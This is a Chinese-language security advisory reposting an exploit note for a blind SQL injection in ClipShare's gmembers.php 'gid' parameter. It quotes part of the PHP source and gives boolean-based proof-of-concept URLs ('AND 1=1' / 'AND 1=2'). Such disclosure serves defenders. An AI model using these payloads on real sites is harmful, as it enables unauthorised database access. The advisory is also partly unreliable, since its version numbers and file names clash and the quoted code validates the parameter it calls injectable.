ClipShare 'gid'参数SQL注入漏洞
ClipShare 'gid'参数SQL注入漏洞
发布日期:2013-03-25
更新日期:2013-03-26
受影响系统:
clipshare ClipShare 4.1.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58681
ClipShare是开启视频共享社区网站的脚本。
ClipShare 4.1.1 (gmembers.php)在实现上存在SQL盲注漏洞,在添加组到社区时会受到此漏洞的影响。要利用此漏洞必须在服务器端关闭MAGIC_QUOTES_GPC指令。
<*来源:Esac
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community
#Last Checked: 24 March 2013
#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
==============================================================================================
#Vulnerable Script:
PHP script : members.php on line 23
=========================== BEGIN OF gmembers.php =============================================
<?php
/************************************************************************************************
| Software Name : ClipShare - Video Sharing Community Script
| Software Author : Clip-Share.Com / ScriptXperts.Com
| Website : http://www.clip-share.com
| E-mail : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/
require('include/config.php');
require('include/function.php');
require('classes/pagination.class.php');
require('language/' .$_SESSION['language']. '/gmembers.lang.php');
$gname = NULL;
$gurl = NULL;
$oid = NULL;
$gid = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;
$sql = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1";
$rs = $conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
$urlkey = $rs->fields['gurl'];
$gname = $rs->fields['gname'];
$gupload = $rs->fields['gupload'];
$oid = $rs->fields['OID'];
STemplate::assign('gname', $gname);
STemplate::assign('gurl', $urlkey);
STemplate::assign('gupload', $gupload);
} else {
session_write_close();
header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
die();
}
...........................................;
...............................................
?>
============================================================================================================
Poc :
http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]
Real exploitation :
http://server/mavideo/gmembers.php?gid=6 AND 1=1
==> return normal page
http://server/mavideo/gmembers.php?gid=6 AND 1=2
==> return page with some errors ( or with nothing - white page )
--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz : White Tarbouch Team
./Esac
建议:
--------------------------------------------------------------------------------
厂商补丁:
clipshare
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.clip-share.com/
评论暂时关闭